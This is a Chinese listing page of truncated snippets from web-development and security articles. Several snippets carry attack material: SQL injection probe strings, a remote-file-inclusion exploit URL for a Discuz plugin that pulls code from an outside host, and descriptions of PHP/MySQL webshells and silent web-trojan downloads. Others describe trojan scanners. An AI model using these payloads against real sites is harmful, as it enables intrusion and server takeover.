搜索列表
-
ASP解压缩(在线解压缩类)
【ASP编程】复制代码 代码如下:<% '\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ '\\ '\\ 1. c:\windows\system32\cmd.exe '\\ 拷贝把本文件所在的路径 '\\ '\\ 2. 把 c:\program\winrar\rar.exe '\\ 拷贝把本文件所在的路径 并改名为WinRAR.exe '\\ '\\...
ASP解压缩(在线解压缩类) -
转载一个别人收藏的精典网站Ruby,HIBERNATE相关
【其它脚本】ror官方网站:http://www.rubyonrails.org/可以作为了解这项技术的起点,那里面有一个15分钟搭建一个blog的视频很值得一看Rolling with Ruby on Rails:http://www.onlamp.com/pub/a/onlamp/2005/01/20/rails.html?page=1Curt Hibbs写的对于ror的学习过程,还没来得及看,但是实在是太多地方reference了...随大...
转载一个别人收藏的精典网站RubyHIBERNATE相关 -
全面了解ASP注入方法 [收集总结]
【安全相关】1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符 'and [查询条件] and ''=' 4.搜索时没过滤参数的 'and [查询条件] and '%25'=' 5.判断数据库系统 ;and (select count(*) from sysobjects)>...
全面了解ASP注入方法[收集总结] -
雷客图ASP站长安全助手的ASP木马查找功能
【ASP编程】可以在线查找空间里的asp木马复制代码 代码如下:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置密码 PASSWORD = "jb51net" dim Report if request.QueryString("act")="login" then if request...
雷客图ASP站长安全助手的ASP木马查找功能 -
淘特ASP木马扫描器的代码
【ASP编程】+-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了。目前可以查杀所有流行的ASP木马程序。 系统提供了全站扫描、按文...
淘特ASP木马扫描器的代码 -
网页木马代码例子(里面的文件是漏洞扫描器,呵呵)
【ASP编程】对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me! (提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补...
网页木马代码例子(里面的文件是漏洞扫描器,呵呵) -
PHPSHELL又出新东东啦!
【安全相关】描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1 读取服务器上的文件 2 移动服务器上的文件 3 上传文件到服务器上 4 有回显的执行命令,不用担心防火墙的限制而不能反弹shell啦! 5 支持Mysql 4.0与Mys...
PHPSHELL又出新东东啦! -
渗透中用openrowset搞shell的方法
【安全相关】渗透中用openrowset搞shell的方法 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了. 联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事...
渗透中用openrowset搞shell的方法 -
PHPSHELL又出新东东啦!
【安全相关】描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1 读取服务器上的文件 2 移动服务器上的文件 3 上传文件到服务器上 4 有回显的执行命令,不用担心防火墙的限制而不能反弹shell啦! 5 支持Mysql 4.0与Mys...
PHPSHELL又出新东东啦! -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
一个简单的HTML病毒分析
【ASP编程】一直就想写这篇东西了,只是上班时说要上班,不写,回家后又忙着玩游戏,丢一边去了。现在只好不务正业的开写了,希望头儿不会知道我的blog。哈哈 在很久之前就对HTML的病毒很感兴趣了,很好奇怎么能远程向本地不经过允许就能下载可执行文件的,只是一直没机会搞得到ASP的原码,所以不才敢断章取义的去作什么分析。最...
|一个|个简|简单|单的|的H|HT|TM|ML|L病|病毒|毒分|分析|析|
